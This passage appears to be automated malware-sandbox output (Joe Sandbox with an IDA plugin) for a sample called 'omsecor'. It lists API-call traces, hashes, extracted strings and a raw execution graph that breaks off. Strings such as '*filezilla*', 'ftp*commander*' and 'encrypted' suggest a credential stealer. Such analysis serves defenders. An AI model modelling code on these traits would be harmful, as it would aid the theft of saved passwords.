                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                          • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:0.3%
                          Signature Coverage:0%
                          Total number of Nodes:1163
                          Total number of Limit Nodes:12
                          execution_graph 3534 4012c0 FindFirstFileA 3537 401080 GetTickCount 3534->3537 3536 4012e8 3549 401655 3537->3549 3539 4010a2 3540 4010b1 GetDesktopWindow GetClassNameA 3539->3540 3541 4010e7 GlobalAlloc 3539->3541 3540->3539 3552 4012f0 3541->3552 3543 401116 3544 40112c GetCurrentProcess GetProcessIoCounters GetCurrentProcess GetProcessTimes 3543->3544 3546 4011ca 3543->3546 3544->3543 3547 4012a5 ExitProcess 3546->3547 3556 401000 3546->3556 3560 401d3d 3549->3560 3553 401308 3552->3553 3554 40132f __VEC_memcpy 3553->3554 3555 401337 3553->3555 3554->3555 3555->3543 3557 40106d 3556->3557 3558 40101a 3556->3558 3557->3546 3559 401020 GetTickCount 3558->3559 3559->3557 3559->3559 3565 401cc6 GetLastError 3560->3565 3562 401d43 3564 40165a 3562->3564 3580 402149 3562->3580 3564->3539 3587 401b98 TlsGetValue 3565->3587 3568 401d31 SetLastError 3568->3562 3569 401ce3 3592 404032 3569->3592 3574 401d10 3607 401c07 3574->3607 3575 401d28 3621 403f64 3575->3621 3578 401d18 GetCurrentThreadId 3578->3568 3579 401d2e 3579->3568 3581 402605 __FF_MSGBANNER 67 API calls 3580->3581 3582 40214e 3581->3582 3583 402465 _abort 67 API calls 3582->3583 3584 402157 3583->3584 3585 401b21 _raise 67 API calls 3584->3585 3586 402162 3585->3586 3586->3564 3588 401bc6 3587->3588 3589 401bab 3587->3589 3588->3568 3588->3569 3590 401b21 _raise 65 API calls 3589->3590 3591 401bb6 TlsSetValue 3590->3591 3591->3588 3595 404036 3592->3595 3594 401cef 3594->3568 3597 401b21 TlsGetValue 3594->3597 3595->3594 3596 404056 Sleep 3595->3596 3634 406717 3595->3634 3596->3595 3598 401b34 3597->3598 3599 401b55 GetModuleHandleA 3597->3599 3598->3599 3600 401b3e TlsGetValue 3598->3600 3601 401b66 3599->3601 3606 401b4d 3599->3606 3603 401b49 3600->3603 3894 401a3e 3601->3894 3603->3599 3603->3606 3604 401b6b 3605 401b6f GetProcAddress 3604->3605 3604->3606 3605->3606 3606->3574 3606->3575 3906 402f98 3607->3906 3609 401c13 GetModuleHandleA 3610 401c64 InterlockedIncrement 3609->3610 3611 401c35 3609->3611 3612 4034ee __lock 63 API calls 3610->3612 3613 401a3e _raise 63 API calls 3611->3613 3614 401c8b 3612->3614 3615 401c3a 3613->3615 3907 40365f InterlockedIncrement 3614->3907 3615->3610 3616 401c3e GetProcAddress GetProcAddress 3615->3616 3616->3610 3618 401caa 3919 401cbd 3618->3919 3620 401cb7 _raise 3620->3578 3623 403f70 _raise 3621->3623 3622 403fe9 _raise _realloc 3622->3579 3623->3622 3625 4034ee __lock 65 API calls 3623->3625 3633 403faf 3623->3633 3624 403fc4 HeapFree 3624->3622 3626 403fd6 3624->3626 3630 403f87 ___sbh_find_block 3625->3630 3627 40427c _raise 65 API calls 3626->3627 3628 403fdb GetLastError 3627->3628 3628->3622 3629 403fa1 3930 403fba 3629->3930 3630->3629 3923 4050b8 3630->3923 3633->3622 3633->3624 3635 406723 _raise 3634->3635 3636 40673b 3635->3636 3646 40675a _memset 3635->3646 3647 40427c 3636->3647 3640 4067cc RtlAllocateHeap 3640->3646 3641 406750 _raise 3641->3595 3646->3640 3646->3641 3653 4034ee 3646->3653 3660 405861 3646->3660 3666 406813 3646->3666 3669 404832 3646->3669 3648 401cc6 _raise 67 API calls 3647->3648 3649 404281 3648->3649 3650 40421d 3649->3650 3651 401b21 _raise 67 API calls 3650->3651 3652 40422b __invoke_watson 3651->3652 3654 403501 3653->3654 3655 403514 RtlEnterCriticalSection 3653->3655 3672 40342b 3654->3672 3655->3646 3657 403507 3657->3655 3658 402149 __amsg_exit 66 API calls 3657->3658 3659 403513 3658->3659 3659->3655 3662 40588d 3660->3662 3661 405926 3665 40592f 3661->3665 3889 40547c 3661->3889 3662->3661 3662->3665 3882 4053cc 3662->3882 3665->3646 3893 403416 RtlLeaveCriticalSection 3666->3893 3668 40681a 3668->3646 3670 401b21 _raise 67 API calls 3669->3670 3671 40483d 3670->3671 3671->3646 3673 403437 _raise 3672->3673 3674 40345d 3673->3674 3698 402605 3673->3698 3682 40346d _raise 3674->3682 3744 403ff2 3674->3744 3680 40348e 3686 4034ee __lock 67 API calls 3680->3686 3681 40347f 3685 40427c _raise 67 API calls 3681->3685 3682->3657 3685->3682 3687 403495 3686->3687 3688 4034c9 3687->3688 3689 40349d 3687->3689 3690 403f64 ___free_lconv_mon 67 API calls 3688->3690 3749 404763 3689->3749 3692 4034ba 3690->3692 3762 4034e5 3692->3762 3693 4034a8 3693->3692 3694 403f64 ___free_lconv_mon 67 API calls 3693->3694 3696 4034b4 3694->3696 3697 40427c _raise 67 API calls 3696->3697 3697->3692 3765 404c30 3698->3765 3700 40260c 3701 402619 3700->3701 3702 404c30 __FF_MSGBANNER 67 API calls 3700->3702 3703 402465 _abort 67 API calls 3701->3703 3705 40263b 3701->3705 3702->3701 3704 402631 3703->3704 3706 402465 _abort 67 API calls 3704->3706 3707 402465 3705->3707 3706->3705 3708 402471 3707->3708 3709 404c30 __FF_MSGBANNER 64 API calls 3708->3709 3740 4025c7 3708->3740 3710 402491 3709->3710 3711 4025cc GetStdHandle 3710->3711 3712 404c30 __FF_MSGBANNER 64 API calls 3710->3712 3713 4025da _strlen 3711->3713 3711->3740 3714 4024a2 3712->3714 3716 4025f4 WriteFile 3713->3716 3713->3740 3714->3711 3715 4024b4 3714->3715 3715->3740 3772 404bcb 3715->3772 3716->3740 3719 4024ea GetModuleFileNameA 3721 402508 3719->3721 3727 40252b _strlen 3719->3727 3723 404bcb _strcpy_s 64 API calls 3721->3723 3724 402518 3723->3724 3726 404121 __invoke_watson 10 API calls 3724->3726 3724->3727 3725 40256e 3797 404a11 3725->3797 3726->3727 3727->3725 3788 404a82 3727->3788 3731 402592 3734 404a11 _strcat_s 64 API calls 3731->3734 3733 404121 __invoke_watson 10 API calls 3733->3731 3735 4025a3 3734->3735 3737 4025b4 3735->3737 3738 404121 __invoke_watson 10 API calls 3735->3738 3736 404121 __invoke_watson 10 API calls 3736->3725 3806 404854 3737->3806 3738->3737 3741 402193 3740->3741 3843 40216d GetModuleHandleA 3741->3843 3746 403ff6 3744->3746 3747 403478 3746->3747 3748 40400e Sleep 3746->3748 3846 406654 3746->3846 3747->3680 3747->3681 3748->3746 3750 40476f _raise 3749->3750 3751 401b21 _raise 65 API calls 3750->3751 3752 40477f 3751->3752 3756 4047d3 _raise 3752->3756 3864 4021f2 3752->3864 3754 40478f 3755 40479e 3754->3755 3757 404121 __invoke_watson 10 API calls 3754->3757 3758 4047a7 GetModuleHandleA 3755->3758 3760 4047c8 3755->3760 3756->3693 3757->3755 3759 4047b6 GetProcAddress 3758->3759 3758->3760 3759->3760 3871 401aaa TlsGetValue 3760->3871 3881 403416 RtlLeaveCriticalSection 3762->3881 3764 4034ec 3764->3682 3766 404c3b 3765->3766 3767 404c45 3766->3767 3768 40427c _raise 67 API calls 3766->3768 3767->3700 3769 404c5e 3768->3769 3770 40421d _raise 67 API calls 3769->3770 3771 404c6e 3770->3771 3771->3700 3773 404be0 3772->3773 3774 404bd8 3772->3774 3775 40427c _raise 67 API calls 3773->3775 3774->3773 3776 404c07 3774->3776 3780 404be5 3775->3780 3778 4024d6 3776->3778 3779 40427c _raise 67 API calls 3776->3779 3777 40421d _raise 67 API calls 3777->3778 3778->3719 3781 404121 3778->3781 3779->3780 3780->3777 3782 405f60 _memset 3781->3782 3783 4041b2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3782->3783 3784 4041f5 GetCurrentProcess TerminateProcess 3783->3784 3787 4041e9 __invoke_watson 3783->3787 3785 401662 setSBUpLow 5 API calls 3784->3785 3786 4024e7 3785->3786 3786->3719 3787->3784 3793 404a92 3788->3793 3789 404a96 3790 40427c _raise 67 API calls 3789->3790 3791 40255b 3789->3791 3792 404ab2 3790->3792 3791->3725 3791->3736 3794 40421d _raise 67 API calls 3792->3794 3793->3789 3793->3791 3795 404adc 3793->3795 3794->3791 3795->3791 3796 40427c _raise 67 API calls 3795->3796 3796->3792 3798 404a26 3797->3798 3800 404a1e 3797->3800 3799 40427c _raise 67 API calls 3798->3799 3805 404a2b 3799->3805 3800->3798 3802 404a5b 3800->3802 3801 40421d _raise 67 API calls 3803 402581 3801->3803 3802->3803 3804 40427c _raise 67 API calls 3802->3804 3803->3731 3803->3733 3804->3805 3805->3801 3807 401b18 _raise 61 API calls 3806->3807 3808 404862 3807->3808 3809 40487c LoadLibraryA 3808->3809 3813 404924 3808->3813 3810 404891 GetProcAddress 3809->3810 3823 4049f5 3809->3823 3812 4048a7 3810->3812 3810->3823 3811 4049af 3815 401b21 _raise 61 API calls 3811->3815 3839 404994 3811->3839 3816 401aaa __init_pointers 61 API calls 3812->3816 3813->3811 3817 401b21 _raise 61 API calls 3813->3817 3814 401b21 _raise 61 API calls 3814->3823 3824 4049bf 3815->3824 3818 4048ad GetProcAddress 3816->3818 3819 404944 3817->3819 3820 401aaa __init_pointers 61 API calls 3818->3820 3821 401b21 _raise 61 API calls 3819->3821 3822 4048c2 GetProcAddress 3820->3822 3836 404951 3821->3836 3825 401aaa __init_pointers 61 API calls 3822->3825 3823->3740 3828 401b21 _raise 61 API calls 3824->3828 3824->3839 3826 4048d7 3825->3826 3827 4021f2 ___crtInitCritSecAndSpinCount 61 API calls 3826->3827 3829 4048e5 3827->3829 3828->3839 3830 4048f5 3829->3830 3832 404121 __invoke_watson 10 API calls 3829->3832 3830->3813 3833 4048fe GetProcAddress 3830->3833 3831 40497c 3834 402229 _raise 61 API calls 3831->3834 3832->3830 3835 401aaa __init_pointers 61 API calls 3833->3835 3837 404985 3834->3837 3838 40490c 3835->3838 3836->3811 3836->3831 3837->3839 3841 404121 __invoke_watson 10 API calls 3837->3841 3838->3813 3840 404916 GetProcAddress 3838->3840 3839->3814 3842 401aaa __init_pointers 61 API calls 3840->3842 3841->3839 3842->3813 3844 40218c ExitProcess 3843->3844 3845 40217c GetProcAddress 3843->3845 3845->3844 3847 406701 3846->3847 3853 406662 3846->3853 3848 404832 _realloc 66 API calls 3847->3848 3849 406707 3848->3849 3851 40427c _raise 66 API calls 3849->3851 3850 402605 __FF_MSGBANNER 66 API calls 3850->3853 3852 40670d 3851->3852 3852->3746 3853->3850 3854 406605 _malloc 66 API calls 3853->3854 3855 402465 _abort 66 API calls 3853->3855 3856 4066c5 RtlAllocateHeap 3853->3856 3857 402193 _fast_error_exit GetModuleHandleA GetProcAddress ExitProcess 3853->3857 3858 4066f8 3853->3858 3859 4066ec 3853->3859 3860 404832 _realloc 66 API calls 3853->3860 3862 4066ea 3853->3862 3854->3853 3855->3853 3856->3853 3857->3853 3858->3746 3861 40427c _raise 66 API calls 3859->3861 3860->3853 3861->3862 3863 40427c _raise 66 API calls 3862->3863 3863->3858 3865 4021fd 3864->3865 3866 40427c _raise 67 API calls 3865->3866 3867 402223 3865->3867 3868 402202 3866->3868 3867->3754 3869 40421d _raise 67 API calls 3868->3869 3870 402212 3869->3870 3870->3754 3872 401abd 3871->3872 3873 401ade GetModuleHandleA 3871->3873 3872->3873 3874 401ac7 TlsGetValue 3872->3874 3875 401ad6 3873->3875 3876 401aef 3873->3876 3878 401ad2 3874->3878 3875->3756 3877 401a3e _raise 63 API calls 3876->3877 3879 401af4 3877->3879 3878->3873 3878->3875 3879->3875 3880 401af8 GetProcAddress 3879->3880 3880->3875 3881->3764 3883 405413 RtlAllocateHeap 3882->3883 3884 4053df RtlReAllocateHeap 3882->3884 3886 4053fd 3883->3886 3887 405436 VirtualAlloc 3883->3887 3885 405401 3884->3885 3884->3886 3885->3883 3886->3661 3887->3886 3888 405450 HeapFree 3887->3888 3888->3886 3890 405491 VirtualAlloc 3889->3890 3892 4054d8 3890->3892 3892->3665 3893->3668 3899 402229 3894->3899 3896 401a59 3897 401a60 _raise 3896->3897 3898 401a64 GetModuleHandleA 3896->3898 3897->3604 3898->3897 3900 402234 3899->3900 3901 402259 3900->3901 3902 40427c _raise 67 API calls 3900->3902 3901->3896 3903 402239 3902->3903 3904 40421d _raise 67 API calls 3903->3904 3905 402249 3904->3905 3905->3896 3906->3609 3908 40367a InterlockedIncrement 3907->3908 3909 40367d 3907->3909 3908->3909 3910 403687 InterlockedIncrement 3909->3910 3911 40368a 3909->3911 3910->3911 3912 403694 InterlockedIncrement 3911->3912 3913 403697 3911->3913 3912->3913 3914 4036a1 InterlockedIncrement 3913->3914 3916 4036a4 3913->3916 3914->3916 3915 4036b9 InterlockedIncrement 3915->3916 3916->3915 3917 4036c9 InterlockedIncrement 3916->3917 3918 4036d2 InterlockedIncrement 3916->3918 3917->3916 3918->3618 3922 403416 RtlLeaveCriticalSection 3919->3922 3921 401cc4 3921->3620 3922->3921 3924 4050f5 3923->3924 3929 405397 3923->3929 3925 4052e1 VirtualFree 3924->3925 3924->3929 3926 405345 3925->3926 3927 405354 VirtualFree HeapFree 3926->3927 3926->3929 3928 4012f0 ___sbh_free_block __VEC_memcpy 3927->3928 3928->3929 3929->3629 3933 403416 RtlLeaveCriticalSection 3930->3933 3932 403fc1 3932->3633 3933->3932 4812 403000 4813 403038 4812->4813 4814 40302b 4812->4814 4816 401662 setSBUpLow 5 API calls 4813->4816 4815 401662 setSBUpLow 5 API calls 4814->4815 4815->4813 4819 403048 __except_handler4 4816->4819 4817 4030cf 4818 4030a4 __except_handler4 4818->4817 4820 4030bf 4818->4820 4821 401662 setSBUpLow 5 API calls 